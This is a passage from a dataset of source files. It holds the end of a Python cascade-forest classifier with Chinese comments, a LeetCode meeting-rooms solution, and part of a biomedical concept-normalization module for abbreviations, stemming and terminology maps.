每次用其中一个子集当作验证集,剩下的len(train_label)-1个作为训练集,\n # 进行len(train_label)次训练和测试,得到len(train_label)个结果\n # 为了防止过拟合,我们对森林的每一层都做了K折交叉验证\n # n_splits 表示划分为几块(至少是2)\n # shuffle 表示是否打乱划分,默认False,即不打乱\n # random_state 随机种子数,表示是否固定随机起点,Used when shuffle == True.\n kf = KFold(len(train_label), n_folds=self.n_fold, shuffle=True, random_state=0)\n\n # print(\"cross_validation求得kf:\", type(kf), kf)\n\n # 用from sklearn.model_selection 求kf\n # shuffle:在每次划分时,是否打乱\n # ①若为Falses时,其效果等同于random_state等于整数,每次划分的结果相同\n # ②若为True时,每次划分的结果都不一样,表示经过洗牌,随机取样的\n # kf = KFold(len(train_label), shuffle=True, random_state=0).split(train_data.shape[0])\n\n # 参数:森林数=2,每个森里中的树的数量=40,n_fold折交叉验证,层序号(1~20,for循环ing),步数=3\n kfoldwarpper = KfoldWarpper(self.num_forests, n_estimators, self.n_fold, kf, layer_index, self.step)\n # 参数:训练集、对应标签集;返回值是[预测值针对森林数取得均值, 按分类器存放的预测值]\n prob, prob_concatenate = kfoldwarpper.train(train_data, train_label)\n\n self.model.append(kfoldwarpper)\n # 第一层\n if layer_index == 0:\n best_train_prob = prob\n # 指标名称,训练标签集,阈值初值为0.5\n pre_metric = compute_supervise_vec(supervise, best_train_prob, train_label, 0.5)\n # 非第一层\n else:\n now_metric = compute_supervise_vec(supervise, prob, train_label, 0.5)\n if supervise == \"average precision\" or supervise == \"macro_auc\":\n indicator = now_metric < pre_metric\n else:\n indicator = now_metric > pre_metric\n\n if np.sum(indicator) > 0:\n # 计算置信度\n confidence = self.compute_confidence(supervise, prob)\n # 取置信度均值作为阈值\n eta_t = np.mean(confidence[indicator])\n\n train_indicator = confidence < eta_t\n if supervise == \"hamming loss\" or supervise == \"macro_auc\":\n prob[:, train_indicator] = best_train_prob[:, train_indicator]\n prob_concatenate[:, :, train_indicator] = best_concatenate_prob[:, :, train_indicator]\n else:\n prob[train_indicator, :] = best_train_prob[train_indicator, :]\n prob_concatenate[:, train_indicator, :] = best_concatenate_prob[:, train_indicator, :]\n else:\n eta_t = 0\n\n self.eta.append(eta_t)\n\n best_train_prob = prob\n\n best_concatenate_prob = prob_concatenate\n\n pre_metric = compute_supervise_vec(supervise, best_train_prob, train_label, 0.5)\n\n value = compute_supervise(supervise, best_train_prob, train_label, 0.5)\n back = compare_supervise_value(supervise, best_value, value)\n if back:\n bad += 1\n else:\n bad = 0\n best_value = value\n\n # 若近3层没有更新,则舍弃当前层模型和阈值\n if bad >= 3:\n print(\"cascade测试bad:\", bad, \",近3层没有更新,则舍弃当前层模型和阈值\")\n for i in range(bad):\n self.model.pop()\n self.eta.pop()\n break\n # 准备下一层数据\n # transpose函数:重新指定0,1,2三个轴的顺序\n prob_concatenate = best_concatenate_prob.transpose((1, 0, 2))\n prob_concatenate = prob_concatenate.reshape(prob_concatenate.shape[0], -1)\n # 将prob_concatenate拼接到train_data_raw下面,行数会改变,所以axis=1\n train_data = np.concatenate([train_data_raw.copy(), prob_concatenate], axis=1)\n\n # 针对不同指标,对原始测试数据做预测\n def predict(self, test_data_raw, supervise):\n \"\"\"\n :param test_data_raw: array, whose shape is (num_test_samples, num_features)\n :return prob: array, whose shape is (num_test_samples, num_labels)\n \"\"\"\n test_data = test_data_raw.copy()\n best_prob = np.empty([test_data.shape[0], self.num_labels])\n best_concatenate_prob = np.empty([self.num_forests, test_data.shape[0], self.num_labels])\n # zip()函数,两参数中的两迭代对象一一对应并打包成新对象的一个元素\n # 遍历每层的分类器和每层的阈值\n for clf, eta_t in zip(self.model, self.eta):\n # 分类器预测test_data,得到[预测值针对森林数取的均值, 按分类器存放的预测值]\n prob, prob_concatenate = clf.predict(test_data)\n confidence = self.compute_confidence(supervise, prob)\n indicator = confidence < eta_t\n # print(indicator)\n if supervise == \"hamming loss\" or supervise == \"macro_auc\":\n prob[:, indicator] = best_prob[:, indicator]\n prob_concatenate[:, :, indicator] = best_concatenate_prob[:, :, indicator]\n else:\n prob[indicator, :] = best_prob[indicator, :]\n prob_concatenate[:, indicator, :] = best_concatenate_prob[:, indicator, :]\n best_concatenate_prob = prob_concatenate\n best_prob = prob\n prob_concatenate = best_concatenate_prob.transpose((1, 0, 2))\n prob_concatenate = prob_concatenate.reshape(prob_concatenate.shape[0], -1)\n test_data = np.concatenate([test_data_raw.copy(), prob_concatenate], axis=1)\n return best_prob\n","sub_path":"learner/cascade.py","file_name":"cascade.py","file_ext":"py","file_size_in_byte":11312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371790381","text":"'''\n253. Meeting Rooms II\n\nGiven an array of meeting time intervals consisting of start and end times [[s1,e1],[s2,e2],...] (si < ei), find the minimum number of conference rooms required.\n\nExample 1:\n\nInput: [[0, 30],[5, 10],[15, 20]]\nOutput: 2\nExample 2:\n\nInput: [[7,10],[2,4]]\nOutput: 1\n'''\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\nclass Solution(object):\n def minMeetingRooms(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: int\n \"\"\"\n # Best solution:\n # if len(intervals) == 0:\n # return 0\n # res = 0\n # e = 0\n # end = sorted([i.end for i in intervals])\n # start = sorted([i.start for i in intervals])\n # for i in range(len(intervals)):\n # if start[i] < end[e]:\n # res += 1\n # else:\n # e += 1\n # return res\n \n if len(intervals) < 2:\n return len(intervals)\n intervals = sorted(intervals, key = lambda i: i.start, reverse = False)\n rooms = {}\n num = 1\n rooms[num] = [intervals[0]]\n for meet in intervals[1:]:\n # print meet.start,meet.end,rooms\n i = 1\n while i <= num:\n if meet.start >= rooms[i][-1].end:\n rooms[i].append(meet)\n break\n else:\n i+=1\n if i == num+1:\n num += 1\n rooms[num] = [meet]\n return num\n \n","sub_path":"253_MeetingRoomsII.py","file_name":"253_MeetingRoomsII.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136862638","text":"# -*- coding: UTF-8 -*-\nimport os\nimport argparse\nimport codecs\nimport re\nimport shutil\nfrom jpype import *\nfrom data import get_fda_file, get_bioc_file\nimport logging\nfrom data_structure import Entity\nimport norm_utils\nfrom options import opt\nimport numpy as np\n\nclass Util:\n @classmethod\n def setMap(self, keyValueListMap, key, value):\n valueList = keyValueListMap.get(key)\n if valueList == None:\n valueList = list()\n keyValueListMap[key] = valueList\n valueList = Util.setList(valueList, value)\n return keyValueListMap\n\n @classmethod\n def setList(self, listt, value):\n if (value not in listt) and (value != u\"\"):\n listt.append(value)\n return listt\n\n @classmethod\n def firstIndexOf(self, tokens, i, pattern):\n while i >=0:\n if re.match(pattern+r\".*\", tokens[i]):\n i -= 1\n return i\n i -= 1\n return -1\n\n @classmethod\n def read(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n return fp.read()\n\n @classmethod\n def containsAny(self, first, second):\n first_ = set(first)\n second_ = set(second)\n\n return len(first_ & second_) != 0\n\n @classmethod\n def getTokenIndex (self, tokens, token):\n i = 0\n while i < len(tokens):\n if tokens[i] == token:\n return i\n i += 1\n\n return -1\n\n @classmethod\n def addUnique(self, list, newList):\n for value in newList:\n list = Util.setList(list, value)\n return list\n\n\n\n\nclass Abbreviation:\n wikiAbbreviationExpansionListMap = dict()\n\n\n def __init__(self):\n self.textAbbreviationExpansionMap = dict()\n\n @classmethod\n def setWikiAbbreviationExpansionMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n token = re.split(r\"\\|\\|\", line)\n Abbreviation.wikiAbbreviationExpansionListMap = Util.setMap(Abbreviation.wikiAbbreviationExpansionListMap, token[0].lower(), token[1].lower())\n\n @classmethod\n def clearWikiAbbreviationExpansionMap(self):\n Abbreviation.wikiAbbreviationExpansionListMap.clear()\n\n @classmethod\n def getTentativeExpansion(self, tokens, i, abbreviationLength):\n expansion = u\"\"\n while (i >= 0 and abbreviationLength > 0):\n expansion = tokens[i]+\" \"+expansion\n i -= 1\n abbreviationLength -= 1\n\n return expansion.strip()\n\n @classmethod\n def getExpansionByHearstAlgorithm(self, shortForm, longForm):\n sIndex = len(shortForm) - 1\n lIndex = len(longForm) - 1\n\n while(sIndex >= 0):\n currChar = shortForm[sIndex].lower()\n if not currChar.isalnum():\n sIndex -= 1\n continue\n\n while (((lIndex >= 0) and\n (longForm[lIndex].lower() != currChar)) or\n ((sIndex == 0) and (lIndex > 0) and\n (longForm[lIndex-1].isalnum()))):\n lIndex -= 1\n\n if lIndex < 0:\n return u\"\"\n\n lIndex -= 1\n sIndex -= 1\n\n lIndex = longForm.rfind(u\" \", lIndex) + 1\n longForm = longForm[lIndex:]\n\n return longForm\n\n @classmethod\n def getEntireAbbreviation(self, text, string, indexes):\n if len(indexes) != 2:\n return string\n begin = int(indexes[0])\n end = int(indexes[1])\n if re.match(r\"(^|\\s|\\W)[a-zA-Z]/\"+string+r\"/[a-zA-Z](\\s|$|\\W)\", text[begin-3, end+3].lower()) :\n return text[begin-2, end+2].lower()\n elif re.matches(r\"(^|\\s|\\W)\"+string+r\"/[a-zA-Z]/[a-zA-Z](\\s|$|\\W)\", text[begin-1, end+5].lower()):\n return text[begin, end+4].lower()\n elif re.matches(r\"(^|\\s|\\W)[a-zA-Z]/[a-zA-Z]/\"+string+r\"(\\s|$|\\W)\", text[begin-5, end+1].lower()):\n return text[begin-4, end].lower()\n return string\n\n @classmethod\n def getBestExpansion(self, text, expansionList):\n maxNumberOfContentWords = 0\n maxContainedContentWords = 0\n returnExpansion = u\"\"\n for expansion in expansionList:\n expansionContentWordsList = Ling.getContentWordsList(re.split(r\"\\s\", expansion))\n tempNumberOfContentWords = len(expansionContentWordsList)\n tempContainedContentWords = 0\n for expansionContentWord in expansionContentWordsList:\n if text.find(u\" \" + expansionContentWord) != -1 or text.find(expansionContentWord + u\" \") != -1:\n tempContainedContentWords += 1\n\n if tempNumberOfContentWords > maxNumberOfContentWords and tempContainedContentWords == tempNumberOfContentWords:\n maxNumberOfContentWords = tempNumberOfContentWords\n maxContainedContentWords = 1000\n returnExpansion = expansion\n elif tempNumberOfContentWords >= maxNumberOfContentWords and tempContainedContentWords > maxContainedContentWords:\n maxNumberOfContentWords = tempNumberOfContentWords\n maxContainedContentWords = tempContainedContentWords\n returnExpansion = expansion\n\n return returnExpansion\n\n @classmethod\n def getTrimmedExpansion(self, text, string, indexes, expansion):\n if len(indexes) != 2:\n return string\n begin = int(indexes[0])\n end = int(indexes[1])\n if re.matches(r\"(^|\\s|\\W)[a-zA-Z]/\"+string+r\"/[a-zA-Z](\\s|$|\\W)\", text[begin-3, end+3].lower()):\n return expansion[1].lower()\n elif re.matches(r\"(^|\\s|\\W)\"+string+r\"/[a-zA-Z]/[a-zA-Z](\\s|$|\\W)\", text[begin-1, end+5].lower()):\n return expansion[0].lower()\n elif re.matches(r\"(^|\\s|\\W)[a-zA-Z]/[a-zA-Z]/\"+string+r\"(\\s|$|\\W)\", text[begin-5, end+1].lower()):\n return expansion[2].lower()\n return string\n\n @classmethod\n def getAbbreviationExpansion(self, abbreviationObject, text, string, indexes):\n shortForm_longForm_map = abbreviationObject.getTextAbbreviationExpansionMap()\n stringTokens = re.split(r\"\\s\", string)\n\n if len(stringTokens) == 1 and len(stringTokens[0]) == 1 :\n stringTokens[0] = Abbreviation.getEntireAbbreviation(text, string, re.split(r\"\\|\", indexes))\n newString = u\"\"\n\n for stringToken in stringTokens:\n if stringToken in shortForm_longForm_map:\n newString += shortForm_longForm_map.get(stringToken)+u\" \"\n continue\n candidateExpansionsList = Abbreviation.wikiAbbreviationExpansionListMap.get(stringToken) if stringToken in Abbreviation.wikiAbbreviationExpansionListMap else None\n\n if candidateExpansionsList == None:\n newString += stringToken + u\" \"\n else :\n expansion = candidateExpansionsList[0] if len(candidateExpansionsList) == 1 else Abbreviation.getBestExpansion(text, candidateExpansionsList)\n if expansion == u\"\":\n newString += stringToken + u\" \"\n else:\n newString += expansion + u\" \"\n\n if len(stringTokens) == 1 and stringTokens[0] != string:\n newString = getTrimmedExpansion(text, string, re.split(r\"\\|\", indexes), re.split(r\"/\", newString))\n\n newString = newString.strip()\n return u\"\" if newString == (string) else newString\n\n\n def setTextAbbreviationExpansionMap_(self, tokens, abbreviationLength, abbreviation, expansionIndex):\n expansion = Abbreviation.getTentativeExpansion(tokens, expansionIndex, abbreviationLength)\n expansion = Abbreviation.getExpansionByHearstAlgorithm(abbreviation, expansion).lower().strip()\n if expansion != u\"\":\n self.textAbbreviationExpansionMap[abbreviation] = expansion\n\n\n def setTextAbbreviationExpansionMap (self, text):\n lines = re.split(r\"\\n+\", text)\n for line in lines:\n line = line.strip()\n tokens = re.split(r\"\\s+\", line)\n size = len(tokens)\n for i in range(size):\n expansionIndex = -1\n\n if (re.match(r\"\\(\\w+(\\-\\w+)?\\)(,|\\.)?\", tokens[i])) or (re.match(r\"\\([A-Z]+(;|,|\\.)\", tokens[i])):\n expansionIndex = i - 1\n elif re.match(r\"[A-Z]+\\)\", tokens[i]):\n expansionIndex = Util.firstIndexOf(tokens, i, r\"\\(\")\n\n if expansionIndex == -1:\n continue\n\n abbreviation = tokens[i].replace(u\"(\", u\"\").replace(u\")\", u\"\").lower()\n reversedAbbreviation = Ling.reverse(abbreviation)\n\n if abbreviation[len(abbreviation) - 1] == u',' or abbreviation[len(abbreviation) - 1] == u'.' or abbreviation[len(abbreviation) - 1] == u';':\n abbreviation = abbreviation[0: len(abbreviation) - 1]\n\n if (abbreviation in self.textAbbreviationExpansionMap) or (reversedAbbreviation in self.textAbbreviationExpansionMap):\n continue\n\n abbreviationLength = len(abbreviation)\n self.setTextAbbreviationExpansionMap_(tokens, abbreviationLength, abbreviation, expansionIndex)\n if abbreviation not in self.textAbbreviationExpansionMap:\n self.setTextAbbreviationExpansionMap_(tokens, abbreviationLength, reversedAbbreviation, expansionIndex)\n\n def getTextAbbreviationExpansionMap(self):\n return self.textAbbreviationExpansionMap\n\nclass Ling:\n stopwords = set()\n digitToWordMap = dict()\n wordToDigitMap = dict()\n suffixMap = dict()\n prefixMap = dict()\n affixMap = dict()\n logging.info(\"JVM class path {}\".format(os.path.abspath(\".\")))\n startJVM(getDefaultJVMPath(), \"-ea\", \"-Dfile.encoding=UTF-8\", \"-Djava.class.path={}\".format(os.path.abspath(\".\")))\n PorterStemmer = JClass(\"PorterStemmer\")\n AFFIX = u\"ganglioma|cancer\"\n PLURAL_DISORDER_SYNONYMS = [u\"diseases\", u\"disorders\", u\"conditions\", u\"syndromes\", u\"symptoms\",\n u\"abnormalities\", u\"events\", u\"episodes\", u\"issues\", u\"impairments\"]\n PREPOSITIONS = [u\"in\", u\"with\", u\"on\", u\"of\"]\n SINGULAR_DISORDER_SYNONYMS = [u\"disease\", u\"disorder\", u\"condition\", u\"syndrome\", u\"symptom\",\n u\"abnormality\", u\"NOS\", u\"event\", u\"episode\", u\"issue\", u\"impairment\"]\n\n def __init__(self):\n pass\n\n @classmethod\n def setStopwordsList(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n if line == u'':\n continue\n Ling.stopwords.add(line)\n\n @classmethod\n def getStopwordsList(self):\n return Ling.stopwords\n\n @classmethod\n def clearStopwordsList(self):\n Ling.stopwords.clear()\n\n @classmethod\n def setDigitToWordformMapAndReverse(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n Ling.digitToWordMap = Util.setMap(Ling.digitToWordMap, tokens[0], tokens[1]);\n Ling.wordToDigitMap[tokens[1]]=tokens[0]\n\n @classmethod\n def clearDigitToWordformMapAndReverse(self):\n Ling.digitToWordMap.clear()\n Ling.wordToDigitMap.clear()\n\n @classmethod\n def setSuffixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n if len(tokens) == 1:\n values = Ling.suffixMap.get(tokens[0])\n if values == None:\n values = list()\n Ling.suffixMap[tokens[0]]=values\n else:\n Ling.suffixMap = Util.setMap(Ling.suffixMap, tokens[0], tokens[1])\n\n @classmethod\n def clearSuffixMap(self):\n Ling.suffixMap.clear()\n\n @classmethod\n def setPrefixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n value = u\"\" if len(tokens) == 1 else tokens[1]\n Ling.prefixMap[tokens[0]] = value\n\n @classmethod\n def clearPrefixMap(self):\n Ling.prefixMap.clear()\n\n @classmethod\n def setAffixMap(self, file_path):\n with codecs.open(file_path, 'r', 'UTF-8') as fp:\n for line in fp:\n line = line.strip()\n tokens = re.split(r\"\\|\\|\", line)\n value = u\"\" if len(tokens) == 1 else tokens[1]\n Ling.affixMap[tokens[0]] = value\n\n @classmethod\n def clearAffixMap(self):\n Ling.affixMap.clear()\n\n @classmethod\n def getStemmedPhrase(self, string):\n\n stemmed_name = u\"\"\n str_tokens = re.split(r\"\\s+\", string)\n for token in str_tokens:\n if token in Ling.stopwords:\n stemmed_name += token + u\" \"\n continue\n\n stemmed_token = Ling.PorterStemmer.get_stem(token).strip()\n if stemmed_token == u\"\":\n stemmed_token = token\n stemmed_name += stemmed_token + u\" \"\n\n stemmed_name = stemmed_name.strip()\n\n\n return stemmed_name\n\n @classmethod\n def reverse(self, string):\n reversedString = u\"\"\n size = len(string)-1\n for i in range(size, -1, -1):\n reversedString += string[i]\n\n return reversedString\n\n @classmethod\n def getContentWordsList(self, words):\n contentWordsList = list()\n for word in words:\n if word in Ling.stopwords:\n continue\n contentWordsList = Util.setList(contentWordsList, word)\n\n return contentWordsList\n\n\n\n @classmethod\n def getStringPreposition(self, string):\n for preposition in Ling.PREPOSITIONS:\n if string.find(u\" \"+preposition+u\" \") != -1:\n return preposition\n\n return u\"\"\n\n @classmethod\n def getSubstring(self, tokens, begin, end):\n substring = u\"\"\n i = begin\n while i < end:\n substring += tokens[i]+u\" \"\n i += 1\n\n substring = substring.strip()\n return substring\n\n @classmethod\n def getDigitToWordMap(self):\n\n return Ling.digitToWordMap\n\n @classmethod\n def getWordToDigitMap(self):\n return Ling.wordToDigitMap\n\n @classmethod\n def getSuffix_(self, str, len_):\n if len(str) < len_:\n return u\"\"\n\n return str[len(str) - len_]\n\n @classmethod\n def getSuffix(self, str):\n if Ling.getSuffix_(str, 10) in Ling.suffixMap:\n return Ling.getSuffix_(str, 10)\n else:\n if Ling.getSuffix_(str, 7) in Ling.suffixMap:\n return Ling.getSuffix_(str, 7)\n else:\n if Ling.getSuffix_(str, 6) in Ling.suffixMap:\n return Ling.getSuffix_(str, 6)\n else:\n if Ling.getSuffix_(str, 5) in Ling.suffixMap:\n return Ling.getSuffix_(str, 5)\n else:\n if Ling.getSuffix_(str, 4) in Ling.suffixMap:\n return Ling.getSuffix_(str, 4)\n else:\n if Ling.getSuffix_(str, 3) in Ling.suffixMap:\n return Ling.getSuffix_(str, 3)\n else:\n if Ling.getSuffix_(str, 2) in Ling.suffixMap:\n return Ling.getSuffix_(str, 2)\n else:\n return u\"\"\n\n @classmethod\n def getSuffixMap(self):\n\n return Ling.suffixMap\n\n\n @classmethod\n def getPrefix_(self, str, len_):\n if len(str) < len_:\n return u\"\"\n\n return str[0 : len_]\n\n @classmethod\n def getPrefix(self, str):\n if Ling.getPrefix_(str, 5) in Ling.prefixMap:\n return Ling.getPrefix_(str, 5)\n else:\n if Ling.getPrefix_(str, 4) in Ling.prefixMap:\n return Ling.getPrefix_(str, 4)\n else:\n if Ling.getPrefix_(str, 3) in Ling.prefixMap:\n return Ling.getPrefix_(str, 3)\n else:\n return u\"\"\n\n @classmethod\n def getPrefixMap(self):\n return Ling.prefixMap\n\n @classmethod\n def getAffixMap(self):\n return Ling.affixMap\n\n\n @classmethod\n def getMatchingTokensCount(self, phrase1, phrase2):\n tokens = re.split(r\"\\s+\", phrase1)\n\n temp = list()\n temp1 = re.split(r\"\\s+\", phrase2)\n for t in tokens:\n if t in temp1:\n temp.append(t)\n tokens = temp\n\n temp = list()\n for t in tokens:\n if t in Ling.stopwords:\n continue\n temp.append(t)\n tokens = temp\n\n return 0 if len(tokens) == 0 else len(tokens)\n\n\n\n\n\n\n\nclass Terminology:\n\n def __init__(self):\n self.cuiAlternateCuiMap = dict()\n self.nameToCuiListMap = dict()\n self.cuiToNameListMap = dict()\n self.stemmedNameToCuiListMap = dict()\n self.cuiToStemmedNameListMap = dict()\n self.tokenToNameListMap = dict()\n self.compoundNameToCuiListMap = dict()\n self.simpleNameToCuiListMap = dict()\n\n def getTokenToNameListMap(self):\n return self.tokenToNameListMap\n\n def getSimpleNameToCuiListMap(self):\n return self.simpleNameToCuiListMap\n\n def getCuiToNameListMap(self):\n return self.cuiToNameListMap\n\n def getCompoundNameToCuiListMap(self):\n return self.compoundNameToCuiListMap\n\n\n def getStemmedNameToCuiListMap(self):\n return self.stemmedNameToCuiListMap\n\n def getNameToCuiListMap(self):\n\n return self.nameToCuiListMap\n\n\n def getCuiAlternateCuiMap(self):\n return self.cuiAlternateCuiMap\n\n\n def loadMaps(self, conceptName, cui):\n self.nameToCuiListMap = Util.setMap(self.nameToCuiListMap, conceptName, cui)\n self.cuiToNameListMap = Util.setMap(self.cuiToNameListMap, cui, conceptName)\n\n stemmedConceptName = Ling.getStemmedPhrase(conceptName)\n self.stemmedNameToCuiListMap = Util.setMap(self.stemmedNameToCuiListMap, stemmedConceptName, cui)\n self.cuiToStemmedNameListMap = Util.setMap(self.cuiToStemmedNameListMap, cui, stemmedConceptName)\n\n conceptNameTokens = re.split(r\"\\s+\", conceptName)\n for conceptNameToken in conceptNameTokens:\n if conceptNameToken in Ling.getStopwordsList():\n continue\n\n self.tokenToNameListMap = Util.setMap(self.tokenToNameListMap, conceptNameToken, conceptName);\n\n\n\n def loadTerminology(self, dictionary, isMeddra_dict):\n\n # with codecs.open(path, 'r', 'UTF-8') as fp:\n # for line in fp:\n # line = line.strip()\n # if line == u'':\n # continue\n # token = re.split(r\"\\|\\|\", line)\n # cui = token[0]\n #\n # conceptNames = token[1].lower()\n #\n # self.loadMaps(conceptNames, cui)\n\n if isMeddra_dict:\n for cui, conceptNames in dictionary.items():\n self.loadMaps(conceptNames.lower(), cui)\n\n else:\n for cui, concept in dictionary.items():\n\n for concept_name in concept.names:\n\n self.loadMaps(concept_name.lower(), cui)\n\n\n def clearTerminology(self):\n self.cuiAlternateCuiMap.clear()\n self.nameToCuiListMap.clear()\n self.cuiToNameListMap.clear()\n self.stemmedNameToCuiListMap.clear()\n self.cuiToStemmedNameListMap.clear()\n self.tokenToNameListMap.clear()\n self.compoundNameToCuiListMap.clear()\n self.simpleNameToCuiListMap.clear()\n\n def loadTrainingDataTerminology(self, documents, dictionary_reverse, isMeddra_dict):\n\n for document in documents:\n\n for mention in document.entities:\n\n conceptName = mention.name.lower().strip()\n for idx, norm_id in enumerate(mention.norm_ids):\n\n if isMeddra_dict:\n self.loadMaps(conceptName, norm_id)\n cui = norm_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName,\n cui)\n else:\n if norm_id in dictionary_reverse:\n cui = dictionary_reverse[norm_id]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n def loadTrainingDataTerminology_frompath(self, path, dictionary_reverse, isMeddra_dict):\n\n for input_file_name in os.listdir(path):\n if input_file_name.find(\".xml\") == -1:\n continue\n input_file_path = os.path.join(path, input_file_name)\n\n if isMeddra_dict:\n annotation_file = get_fda_file(input_file_path)\n\n for mention in annotation_file.mentions:\n conceptName = mention.name.lower().strip()\n for idx, norm_id in enumerate(mention.norm_ids):\n\n self.loadMaps(conceptName, norm_id)\n\n cui = norm_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName, cui)\n\n else:\n\n annotation_file = get_bioc_file(input_file_path)\n bioc_passage = annotation_file[0].passages[0]\n\n for entity in bioc_passage.annotations:\n if opt.types and (entity.infons['type'] not in opt.type_filter):\n continue\n conceptName = entity.text.lower().strip()\n if ('SNOMED code' in entity.infons and entity.infons['SNOMED code'] != 'N/A') :\n\n if entity.infons['SNOMED code'] in dictionary_reverse:\n cui = dictionary_reverse[entity.infons['SNOMED code']]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n\n elif ('MedDRA code' in entity.infons and entity.infons['MedDRA code'] != 'N/A') :\n\n if entity.infons['MedDRA code'] in dictionary_reverse:\n cui = dictionary_reverse[entity.infons['MedDRA code']]\n self.loadMaps(conceptName, cui[0])\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(\n re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap,\n simpleConceptName,\n cui[0])\n\n\n\n def loadTAC2017Terminology(self, path, dictionary):\n for input_file_name in os.listdir(path):\n if input_file_name.find(\".xml\") == -1:\n continue\n input_file_path = os.path.join(path, input_file_name)\n\n annotation_file = get_fda_file(input_file_path)\n\n for reaction in annotation_file.reactions:\n\n conceptName = reaction.name.lower().strip()\n\n for normalization in reaction.normalizations:\n\n if normalization.meddra_pt_id is None:\n continue\n\n if normalization.meddra_pt_id not in dictionary:\n # logging.info(normalization.meddra_pt_id)\n continue\n\n # conceptName = normalization.meddra_pt.lower().strip()\n\n self.loadMaps(conceptName, normalization.meddra_pt_id)\n\n cui = normalization.meddra_pt_id\n\n simpleConceptNames = SimpleNameSieve.getTerminologySimpleNames(re.split(r\"\\s+\", conceptName))\n for simpleConceptName in simpleConceptNames:\n self.simpleNameToCuiListMap = Util.setMap(self.simpleNameToCuiListMap, simpleConceptName, cui)\n\n @classmethod\n def getOMIMCuis(self, cuis):\n OMIMcuis = list()\n for cui in cuis:\n if cui.find(u\"OMIM\") == -1:\n continue\n cui = re.split(u\":\", cui)[1]\n OMIMcuis = Util.setList(OMIMcuis, cui)\n return OMIMcuis\n\n def setOMIM(self, cuis, MeSHorSNOMEDcuis, conceptName):\n if MeSHorSNOMEDcuis == u\"\": # 如果Mesh ID为空,则用OMIM\n cuis = cuis.replace(u\"OMIM:\", u\"\")\n self.loadMaps(conceptName, cuis)\n\n else : # 否则用OMIM为候选ID\n cuis_arr = re.split(r\"\\|\", cuis)\n for cui in cuis_arr:\n if cui.find(u\"OMIM\") == -1:\n continue\n cui = re.split(u\":\", cui)[1]\n self.cuiAlternateCuiMap = Util.setMap(self.cuiAlternateCuiMap, MeSHorSNOMEDcuis, cui)\n\nclass Concept:\n def __init__(self, indexes, name, goldMeSHorSNOMEDCui, goldOMIMCuis):\n self.indexes = indexes\n self.name = name.lower().strip()\n self.goldMeSHorSNOMEDCui = goldMeSHorSNOMEDCui\n self.goldOMIMCuis = goldOMIMCuis\n self.nameExpansion = None\n self.stemmedName = None\n self.cui = None\n self.alternateCuis = None\n self.normalizingSieveLevel = 0\n self.namesKnowledgeBase = list()\n self.stemmedNamesKnowledgeBase = list()\n\n def setNameExpansion(self, text, abbreviationObject):\n self.nameExpansion = Abbreviation.getAbbreviationExpansion(abbreviationObject, text, self.name, self.indexes)\n\n def setStemmedName(self):\n self.stemmedName = Ling.getStemmedPhrase(self.name)\n\n def setCui(self, cui):\n self.cui = cui\n\n def getCui(self):\n return self.cui\n\n def setAlternateCuis(self, alternateCuis):\n\n self.alternateCuis = list()\n for alternateCui in alternateCuis:\n self.alternateCuis = Util.setList(self.alternateCuis, alternateCui)\n\n def setNormalizingSieveLevel(self, sieveLevel):\n self.normalizingSieveLevel = sieveLevel\n\n def getName(self):\n\n return self.name\n\n def getNormalizingSieve(self):\n return self.normalizingSieveLevel\n\n def getGoldMeSHorSNOMEDCui(self):\n return self.goldMeSHorSNOMEDCui\n\n def getGoldOMIMCuis(self):\n return self.goldOMIMCuis\n\n def getAlternateCuis(self):\n return self.alternateCuis\n\n def getNameExpansion(self):\n return self.nameExpansion\n\n def setNamesKnowledgeBase(self, name):\n if isinstance(name, list):\n self.namesKnowledgeBase = Util.addUnique(self.namesKnowledgeBase, name)\n else:\n self.namesKnowledgeBase = Util.setList(self.namesKnowledgeBase, name)\n\n def getNamesKnowledgeBase(self):\n return self.namesKnowledgeBase\n\n\n def getStemmedNamesKnowledgeBase(self):\n return self.stemmedNamesKnowledgeBase\n\n def setStemmedNamesKnowledgeBase(self, namesList):\n self.stemmedNamesKnowledgeBase = Util.addUnique(self.stemmedNamesKnowledgeBase, namesList)\n\n\nclass Evaluation:\n totalNames = 0\n tp = 0\n fp = 0\n accuracy = 0.0\n map_whichSieveFires = dict()\n\n @classmethod\n def initialize(self, 